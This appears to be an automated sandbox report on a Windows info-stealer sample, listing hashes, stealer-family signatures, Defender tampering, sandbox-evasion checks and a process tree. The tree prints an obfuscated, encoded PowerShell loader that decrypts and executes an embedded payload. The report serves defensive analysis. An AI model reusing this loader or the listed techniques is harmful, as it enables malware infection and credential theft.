Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
22-12-2024 21:49
General
-
Target
JaffaCakes118_7bf2c52e5b861044dce471293247f3926cb7fc8c.exe
-
Size
148.7MB
-
MD5
38036a70b4ed531dadb58f36408871f0
-
SHA1
7bf2c52e5b861044dce471293247f3926cb7fc8c
-
SHA256
6e0775e91dc304bdccef41ad8996aeb886c4d8378dc6f7d9a8789b2739777b32
-
SHA512
d534c5b00157f9bc49e2edf23b952d5bb4a364969027d1079059a4a9bb3753ed3584b7ec601e8ba608f1ee5fd5f20e0f2cc9986d5b1015a18538dd868301b938
-
SSDEEP
3145728:bJ3y6Y5xCztM7YOY65971/AG5xCztM7YOY65971hJ3ZR66:t3yFzGGkOYCnAGzGGkOYC33m
Malware Config
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Mercurialgrabber family
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
-
Stormkitty family
-
Detected Nirsoft tools 10 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
NirSoft WebBrowserPassView 5 IoCs
Password recovery tool for various web browsers
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 17 IoCs
-
Loads dropped DLL 15 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Modifies Security services 2 TTPs 4 IoCs
Modifies the startup behavior of a security service.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
UPX packed file 7 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Windows directory 8 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Detects Pyinstaller 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 59 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7bf2c52e5b861044dce471293247f3926cb7fc8c.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_7bf2c52e5b861044dce471293247f3926cb7fc8c.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32ANTIS.EXE"C:\Windows\System32ANTIS.EXE"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "PowerShell.exe -ExecutionPolicy Unrestricted, powershell.exe -EncodedCommand "JABxAGMAZABoAHkAZQBnAHcAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAIgBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAAiADsAIAAkAHkAdQBzAHYAaABiAHEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATQBuAGMAcgBrAGIALwAyAFoAbABaAFcAYQBPAFYAYwBlAFUATAA1AGYAZwBlAGEATQBPAFUATwBoAHcAVQBNAGgAbwA2ADAAcgBmAFcAawA5AHoAMwBoADUARwBEAGgARQBSAEkAbgBCAEUAMwBLAFMAUwBnAEgAbABUADkAagA3AFAARwBGAEgALwBhADYAZABsAEUAUAB1AHkAKwBhADIAcgBnAE4ATQArAGcAZABIAGMANgBVAE4AVwBxAG4AZABoAEIARABiAEwAbABoAHEAbgBjAGQAcwBMADMAeABVAEYAVQBNAC8AVwB4ACsANgBVADIAZABJAEMAVABZAGIAbABXAFgAUgBYAE4AbgBUAG0AeQBVAFYAVQB1AFgAVQBuAHUAMgAyAHAASgBuAE4AKwBhAEcAZwBHAFEASgAxAHcARgBWAGUANABGAE0AbwA0AFEAbgA1AFcAVgAxAHgAZQB4AGEAQQAzADYAWQBTAFgANQBPADcAZQBsADYAZABpAHAAQwBQAFgAYgByAGkANwA5ADgAVQAzAFgASABhAEgAbwBXAG0AeQBRAG8ARwBlAHMAagBEAEkAWgBnAFIAZgB4ACsATQA3AGEARABjAEUAagBxADMAcwBDAEUAWQBNAFAASgBCAHAAZwA0AFQATwB2AHQALwBmADEASgBuADEANwA0AFcASwBSAHoAMwA5AGIAWABwAGsAWAA5AEoAQQBpAGYAcwBlADYAaAArADAAZgA2AEoANwArAHEARwA3AEQAWQBOADUANQBJAHIAVgBEAGQAWQA2AHkAMAAxAGgAegBvAG8ASwBQAGEAUgBxAFIANAB2ADgATQB0AFcAcgAzAHAAMQBpAC8ARgBNAFIAUwB6AFkAawBkAHAARABzAHIAcwBzADQASwA3AEsAdgBUAEgAZQB5AE8AVgBsAHoAMgA5AHcAbABTAE4AYwB3AGEATgBkAHIAdgBPADEAbwBIACsAaQA2AFgAegB5AGoARwBXAGcAcQAxAC8ARgBBAFkAVQBYAEQANABZAEYANwBLAE4AYgBNADIAdgBSAFYAQgB0AEIAbABsADgAawBRAHcAeAAxAC8AWgBwAHAAVwB2ADIAaABGAEcAVQBzAE0AUwA3AGgAWgB2AFAAQwBRAEIAUQBGAEQAZABKAGQAdABGAGQAWQBUADIARwBIAFMAcABIAGcAbQBDAFYAUABWAG0AdQBOAHcATABxAFYAUABjADYARABDAG4AbABRAC8AUABVAFYARgBYAFoAdABrAHEAZgBHAFIAVgB4AGgAcABvAGEASAB5AGQASAA0AFcAVABCAHUAVQBUAGoAZQAyAFAASABvADQATABiAEYATQB2AHkAYQBDAGkAcwA1AFgAaQBIADUAdABOAEEAWQBDADcAMQA3AGQAYgBSAEIATgBPADEAcwBlAFkASQAzAHUAbgBpADUAVABKAHYASABCAHAAeABRAHcAaABSAGIAZwB4AGQAMwBTADAAVwBaAEMATAA0AG0ASwA3AGkAOABVAG8AWQBMAHQAdwAxAEkASQBzAFIAZgBsADIARgBGAGUARwBFAHUAVgBSADcATwBBAGIAWQA4AEYAbgBRADAAZQB1AGUAbgA5AEQAMwBBAHUAQwB3AGQAMgBWAG8AeQBnADAAUAB1AHUAVgBFAFoANwBaAFIAbwBqAEQAdABFADIAVwAzAHYAZQBRAEgAbABNADcAYQBHAFgAUwBOADEAMABoACsAaQArAGcAaAB6AFMAaABFAEEAeQBsADIAVwBlAE8AbQBkAFIAdAB4ADIAbgBUAE0AdwBaADcASABXADUAMQBLAEoAYQB0AE0ASAByADQASgB3AEkAaQBoAC8AMwBiAHMAcABXADMAcQBLADYAVwBvADAANgAxAFMATgBJAEEAVQBkAHoAQwBVAFQAYwB1AFoASQBNAHEAeQBhAHAAYgBJAE0AbgBJADEAKwBFAHgARABVAHoAdgBaAGYAUwBXAGUAbABpAGEAWABvAHYAcABVAEUAVwAwAG4ARAB3AEUALwBDADYAMgBIAHEAbQAwAGEAUABCADcAQwBXAEEANAB4AGcANgBCAHoARgByAGEAWAAxADEAcgBOAEoAagB0AEcAUgBNAFMATQBDAHkAYQBmAFQAaABFAE8AeQBOAFMAUQBmAG4AYwBxAHQASQBYAGoASgB6AG4AWQBKAHMANABFADIAcAA4ADIAZgBjAE8AaABBACsATwBwAFkANgBSAFoASQBEAG8AbQBtAHUAZgA2AFEASQBEAFYATwBvAEIARAA3AFEAVwBWADIAbQA0ADkAOQBPAFgANABnADYAbQA4ADkAUQBTAEwATwBGAFYATgBrAHgAegA3AE0AYgBuAG8AVwA2AEcAdwA0ADcARQA3AHEAcQA2AGgANwA3AGUATwBTAFgAOQB3AG8AYwBhAHQAYgBGAHIAZgB6AEUAVQBEADMAQwBTAGMAcABKADcATwBuAEsAdgBCAHQAdQBEAHQALwBZAHIAZABpAEYAVQBsAE0ALwBUAG4ARgB2AFQAcgBuADQATQB1AEIAOQBZAFMAUABsAEMARwBCAGEAcQBEAHUAZgA3ADYANwBZADAAYQBlAFgALwBjAFIAVABPAEMAUQAwAEoASQA2AC8ARAB6AHcAcgBIAHQAUQBuAHMAeQA3AFgATQB3ADMANQBZAFYAcwBBADQAaQBKAGMATQBOAFgAZABiADYAbQB2ADAATwBMAFUATABuAEkAQwBWADQAZwAyADEAcgA0AFEAMABhAG8ARgBJAHUARAAzAG4AZwBQAHQAYgByAFAAdgBjAFIAdABoAGQASABRAFcAcgBjAHoAMQBxAEUAOQBvAFUAcwBxAHEAYgBEAHoARwBSAFgAUQBtADcASwBxAEIAaAB5AHgAYQBWAGUAagBjADcAagA0AG8ARABCAGoAcQA2AEwARwBQAEoAdQAwAHgAbQAwADYAVwB6AE0ANwBZAE0AcQAvAHQAaQA3ADcAZQBCAHgAdQBZAHEAQQBoAEUAMgBjAHcAdABRAEkAdQBYAHgAegA5AHEAQgAxAFoASABRAHUAeQBKAHcAcgBjAEoAZABzAGoAcQBwAFAAWgBHAFQAZAB0AHAASgBzAFQAMAAxAG8AdABMAHgANABpAHMAcQBaAHAARwBNAE0AZQA1AGwARgBxAEkAUgB2AG4AcwBzADgAeQBGADYAawBvAFAATwBZAGIASwBMADEATwA0ADIAQgBaAEwAcgBIAGwAVQB6AHcATQBUADgAOABaAGgASwBDAHMAVAB3AFkAMgBEAEQAcQB6AE0ARgBPAFUAeQB1AHgATQBLAGMAZgBEADYAVwBZAGIAVAB1AFIANABuAGUAYgA5AHkANwB6AHoASgB4AGcAagBZAHkAMQBsAGwAZABSAEQAdgBlADEANgBqACsALwBtAG4ATQBhAEIAbABUAE8AKwBYAE0AcwByAE8AQQBMAFQAeABtAG0ARQB3AGkASgBlADgATgBzAG4AUQBtAGYAeQBUAFkAMgBuAHgAdgBmAEkAdwBiAFAAVwB5ADgATgBsAC8AYwAwAFIARwAwAEIASwA2ADgAKwBsAEUAQwBOAGMASQA3AEsAYgB4AEkAdwBLAGwAcgArAFkAdAB3AGoANgBGAHgAMABFAGQAawBlAGgAdwB5AHEAegBIACsAOQBGAFUAagBMAHEAMABHAHMATgBKADMAQQBrAGkAQQBSADQASgB4AGQASQBKAHYASABjAFgAeABKAFkAdgBrAHoAbwBIAHMAcABwADYAUQA3AEIAQQBnAFAATABnAEcAagBuAFIANwArAGsAYgBoAHAASABMAE4AYQBpADcATAA0AEMAQQBZAGcASgBlADkAOABnAEsAcQBvAEIARQBsAHgAdgBhAEkAYQBRADQAegBIAHoAdABVADMAVQBFAGcAUABZAHgAUgBVAG0AcQBoAGwAYgB2ADAAUQBSAEYANQBlAGoASQBrAEoAWQBPAEMAbABKAEQASgBJAHkAcgB3AG4AMgBtAGcAdgAyAHEAYgArAHAAegBVAHUAZwBOAGcANQAvADIATAA3AFgAVABIAFAAUAArAEEAOABGAE8ASgBhADMATwBXAE0AaAB6AGUAQgBFAFQAYwB4AG4ATgB5AGMAaQBtAFQANgBOAE4AZwA9ACIAKQA7ACAAJABnAGEAeAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFoAYQBPAGMAagBaAHYAcQBqAE4AYgBCAHgAQgA2AGEARQBEAHcAZwB0AFUAYQBOAGgAUAA2AG0AdwBkAFMAbAAvAHgAegBTAFAAKwAwAHIAdwBNAGcAPQAiACkAOwAgACQAcQBjAGQAaAB5AGUAZwB3AGgALgBCAGwAbwBjAGsAUwBpAHoAZQAgAD0AIAAxADIAOAA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBFAEMAQgA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAEkAVgAgAD0AIAAkAHkAdQBzAHYAaABiAHEAWwAwAC4ALgAxADUAXQA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFoAZQByAG8AcwA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwAgACQAcQBjAGQAaAB5AGUAZwB3AGgALgBLAGUAeQAgAD0AIAAkAGcAYQB4AHkAOwAgACQAbgBxAGEAYgB4ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAAkAHEAYwBkAGgAeQBlAGcAdwBoAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAeQB1AHMAdgBoAGIAcQAsADEANgAsACQAeQB1AHMAdgBoAGIAcQAuAEwAZQBuAGcAdABoAC0AMQA2ACkAKQA7ACAAJAB6AHIAcABuAGcAbwBmAGsAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAgACQAYQBoAHcAYwBrAGQAZQBoAGYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAgACQAbgBxAGEAYgB4ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAIAAkAGEAaAB3AGMAawBkAGUAaABmAC4AQwBvAHAAeQBUAG8AKAAkAHoAcgBwAG4AZwBvAGYAawApADsAIAAkAG4AcQBhAGIAeAAuAEMAbABvAHMAZQAoACkAOwAgACQAYQBoAHcAYwBrAGQAZQBoAGYALgBDAGwAbwBzAGUAKAApADsAIAAkAHEAYwBkAGgAeQBlAGcAdwBoAC4ARABpAHMAcABvAHMAZQAoACkAOwAgACQAdABlAGIAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHoAcgBwAG4AZwBvAGYAawAuAFQAbwBBAHIAcgBhAHkAKAApACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAoACQAdABlAGIAcgApAA=="5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Unrestricted powershell.exe -EncodedCommand JABxAGMAZABoAHkAZQBnAHcAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAIgBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMATQBhAG4AYQBnAGUAZAAiADsAIAAkAHkAdQBzAHYAaABiAHEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIATQBuAGMAcgBrAGIALwAyAFoAbABaAFcAYQBPAFYAYwBlAFUATAA1AGYAZwBlAGEATQBPAFUATwBoAHcAVQBNAGgAbwA2ADAAcgBmAFcAawA5AHoAMwBoADUARwBEAGgARQBSAEkAbgBCAEUAMwBLAFMAUwBnAEgAbABUADkAagA3AFAARwBGAEgALwBhADYAZABsAEUAUAB1AHkAKwBhADIAcgBnAE4ATQArAGcAZABIAGMANgBVAE4AVwBxAG4AZABoAEIARABiAEwAbABoAHEAbgBjAGQAcwBMADMAeABVAEYAVQBNAC8AVwB4ACsANgBVADIAZABJAEMAVABZAGIAbABXAFgAUgBYAE4AbgBUAG0AeQBVAFYAVQB1AFgAVQBuAHUAMgAyAHAASgBuAE4AKwBhAEcAZwBHAFEASgAxAHcARgBWAGUANABGAE0AbwA0AFEAbgA1AFcAVgAxAHgAZQB4AGEAQQAzADYAWQBTAFgANQBPADcAZQBsADYAZABpAHAAQwBQAFgAYgByAGkANwA5ADgAVQAzAFgASABhAEgAbwBXAG0AeQBRAG8ARwBlAHMAagBEAEkAWgBnAFIAZgB4ACsATQA3AGEARABjAEUAagBxADMAcwBDAEUAWQBNAFAASgBCAHAAZwA0AFQATwB2AHQALwBmADEASgBuADEANwA0AFcASwBSAHoAMwA5AGIAWABwAGsAWAA5AEoAQQBpAGYAcwBlADYAaAArADAAZgA2AEoANwArAHEARwA3AEQAWQBOADUANQBJAHIAVgBEAGQAWQA2AHkAMAAxAGgAegBvAG8ASwBQAGEAUgBxAFIANAB2ADgATQB0AFcAcgAzAHAAMQBpAC8ARgBNAFIAUwB6AFkAawBkAHAARABzAHIAcwBzADQASwA3AEsAdgBUAEgAZQB5AE8AVgBsAHoAMgA5AHcAbABTAE4AYwB3AGEATgBkAHIAdgBPADEAbwBIACsAaQA2AFgAegB5AGoARwBXAGcAcQAxAC8ARgBBAFkAVQBYAEQANABZAEYANwBLAE4AYgBNADIAdgBSAFYAQgB0AEIAbABsADgAawBRAHcAeAAxAC8AWgBwAHAAVwB2ADIAaABGAEcAVQBzAE0AUwA3AGgAWgB2AFAAQwBRAEIAUQBGAEQAZABKAGQAdABGAGQAWQBUADIARwBIAFMAcABIAGcAbQBDAFYAUABWAG0AdQBOAHcATABxAFYAUABjADYARABDAG4AbABRAC8AUABVAFYARgBYAFoAdABrAHEAZgBHAFIAVgB4AGgAcABvAGEASAB5AGQASAA0AFcAVABCAHUAVQBUAGoAZQAyAFAASABvADQATABiAEYATQB2AHkAYQBDAGkAcwA1AFgAaQBIADUAdABOAEEAWQBDADcAMQA3AGQAYgBSAEIATgBPADEAcwBlAFkASQAzAHUAbgBpADUAVABKAHYASABCAHAAeABRAHcAaABSAGIAZwB4AGQAMwBTADAAVwBaAEMATAA0AG0ASwA3AGkAOABVAG8AWQBMAHQAdwAxAEkASQBzAFIAZgBsADIARgBGAGUARwBFAHUAVgBSADcATwBBAGIAWQA4AEYAbgBRADAAZQB1AGUAbgA5AEQAMwBBAHUAQwB3AGQAMgBWAG8AeQBnADAAUAB1AHUAVgBFAFoANwBaAFIAbwBqAEQAdABFADIAVwAzAHYAZQBRAEgAbABNADcAYQBHAFgAUwBOADEAMABoACsAaQArAGcAaAB6AFMAaABFAEEAeQBsADIAVwBlAE8AbQBkAFIAdAB4ADIAbgBUAE0AdwBaADcASABXADUAMQBLAEoAYQB0AE0ASAByADQASgB3AEkAaQBoAC8AMwBiAHMAcABXADMAcQBLADYAVwBvADAANgAxAFMATgBJAEEAVQBkAHoAQwBVAFQAYwB1AFoASQBNAHEAeQBhAHAAYgBJAE0AbgBJADEAKwBFAHgARABVAHoAdgBaAGYAUwBXAGUAbABpAGEAWABvAHYAcABVAEUAVwAwAG4ARAB3AEUALwBDADYAMgBIAHEAbQAwAGEAUABCADcAQwBXAEEANAB4AGcANgBCAHoARgByAGEAWAAxADEAcgBOAEoAagB0AEcAUgBNAFMATQBDAHkAYQBmAFQAaABFAE8AeQBOAFMAUQBmAG4AYwBxAHQASQBYAGoASgB6AG4AWQBKAHMANABFADIAcAA4ADIAZgBjAE8AaABBACsATwBwAFkANgBSAFoASQBEAG8AbQBtAHUAZgA2AFEASQBEAFYATwBvAEIARAA3AFEAVwBWADIAbQA0ADkAOQBPAFgANABnADYAbQA4ADkAUQBTAEwATwBGAFYATgBrAHgAegA3AE0AYgBuAG8AVwA2AEcAdwA0ADcARQA3AHEAcQA2AGgANwA3AGUATwBTAFgAOQB3AG8AYwBhAHQAYgBGAHIAZgB6AEUAVQBEADMAQwBTAGMAcABKADcATwBuAEsAdgBCAHQAdQBEAHQALwBZAHIAZABpAEYAVQBsAE0ALwBUAG4ARgB2AFQAcgBuADQATQB1AEIAOQBZAFMAUABsAEMARwBCAGEAcQBEAHUAZgA3ADYANwBZADAAYQBlAFgALwBjAFIAVABPAEMAUQAwAEoASQA2AC8ARAB6AHcAcgBIAHQAUQBuAHMAeQA3AFgATQB3ADMANQBZAFYAcwBBADQAaQBKAGMATQBOAFgAZABiADYAbQB2ADAATwBMAFUATABuAEkAQwBWADQAZwAyADEAcgA0AFEAMABhAG8ARgBJAHUARAAzAG4AZwBQAHQAYgByAFAAdgBjAFIAdABoAGQASABRAFcAcgBjAHoAMQBxAEUAOQBvAFUAcwBxAHEAYgBEAHoARwBSAFgAUQBtADcASwBxAEIAaAB5AHgAYQBWAGUAagBjADcAagA0AG8ARABCAGoAcQA2AEwARwBQAEoAdQAwAHgAbQAwADYAVwB6AE0ANwBZAE0AcQAvAHQAaQA3ADcAZQBCAHgAdQBZAHEAQQBoAEUAMgBjAHcAdABRAEkAdQBYAHgAegA5AHEAQgAxAFoASABRAHUAeQBKAHcAcgBjAEoAZABzAGoAcQBwAFAAWgBHAFQAZAB0AHAASgBzAFQAMAAxAG8AdABMAHgANABpAHMAcQBaAHAARwBNAE0AZQA1AGwARgBxAEkAUgB2AG4AcwBzADgAeQBGADYAawBvAFAATwBZAGIASwBMADEATwA0ADIAQgBaAEwAcgBIAGwAVQB6AHcATQBUADgAOABaAGgASwBDAHMAVAB3AFkAMgBEAEQAcQB6AE0ARgBPAFUAeQB1AHgATQBLAGMAZgBEADYAVwBZAGIAVAB1AFIANABuAGUAYgA5AHkANwB6AHoASgB4AGcAagBZAHkAMQBsAGwAZABSAEQAdgBlADEANgBqACsALwBtAG4ATQBhAEIAbABUAE8AKwBYAE0AcwByAE8AQQBMAFQAeABtAG0ARQB3AGkASgBlADgATgBzAG4AUQBtAGYAeQBUAFkAMgBuAHgAdgBmAEkAdwBiAFAAVwB5ADgATgBsAC8AYwAwAFIARwAwAEIASwA2ADgAKwBsAEUAQwBOAGMASQA3AEsAYgB4AEkAdwBLAGwAcgArAFkAdAB3AGoANgBGAHgAMABFAGQAawBlAGgAdwB5AHEAegBIACsAOQBGAFUAagBMAHEAMABHAHMATgBKADMAQQBrAGkAQQBSADQASgB4AGQASQBKAHYASABjAFgAeABKAFkAdgBrAHoAbwBIAHMAcABwADYAUQA3AEIAQQBnAFAATABnAEcAagBuAFIANwArAGsAYgBoAHAASABMAE4AYQBpADcATAA0AEMAQQBZAGcASgBlADkAOABnAEsAcQBvAEIARQBsAHgAdgBhAEkAYQBRADQAegBIAHoAdABVADMAVQBFAGcAUABZAHgAUgBVAG0AcQBoAGwAYgB2ADAAUQBSAEYANQBlAGoASQBrAEoAWQBPAEMAbABKAEQASgBJAHkAcgB3AG4AMgBtAGcAdgAyAHEAYgArAHAAegBVAHUAZwBOAGcANQAvADIATAA3AFgAVABIAFAAUAArAEEAOABGAE8ASgBhADMATwBXAE0AaAB6AGUAQgBFAFQAYwB4AG4ATgB5AGMAaQBtAFQANgBOAE4AZwA9ACIAKQA7ACAAJABnAGEAeAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFoAYQBPAGMAagBaAHYAcQBqAE4AYgBCAHgAQgA2AGEARQBEAHcAZwB0AFUAYQBOAGgAUAA2AG0AdwBkAFMAbAAvAHgAegBTAFAAKwAwAHIAdwBNAGcAPQAiACkAOwAgACQAcQBjAGQAaAB5AGUAZwB3AGgALgBCAGwAbwBjAGsAUwBpAHoAZQAgAD0AIAAxADIAOAA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBFAEMAQgA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAEkAVgAgAD0AIAAkAHkAdQBzAHYAaABiAHEAWwAwAC4ALgAxADUAXQA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFoAZQByAG8AcwA7ACAAJABxAGMAZABoAHkAZQBnAHcAaAAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwAgACQAcQBjAGQAaAB5AGUAZwB3AGgALgBLAGUAeQAgAD0AIAAkAGcAYQB4AHkAOwAgACQAbgBxAGEAYgB4ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAAkAHEAYwBkAGgAeQBlAGcAdwBoAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAeQB1AHMAdgBoAGIAcQAsADEANgAsACQAeQB1AHMAdgBoAGIAcQAuAEwAZQBuAGcAdABoAC0AMQA2ACkAKQA7ACAAJAB6AHIAcABuAGcAbwBmAGsAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAgACQAYQBoAHcAYwBrAGQAZQBoAGYAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAgACQAbgBxAGEAYgB4ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAIAAkAGEAaAB3AGMAawBkAGUAaABmAC4AQwBvAHAAeQBUAG8AKAAkAHoAcgBwAG4AZwBvAGYAawApADsAIAAkAG4AcQBhAGIAeAAuAEMAbABvAHMAZQAoACkAOwAgACQAYQBoAHcAYwBrAGQAZQBoAGYALgBDAGwAbwBzAGUAKAApADsAIAAkAHEAYwBkAGgAeQBlAGcAdwBoAC4ARABpAHMAcABvAHMAZQAoACkAOwAgACQAdABlAGIAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHoAcgBwAG4AZwBvAGYAawAuAFQAbwBBAHIAcgBhAHkAKAApACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAoACQAdABlAGIAcgApAA==6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
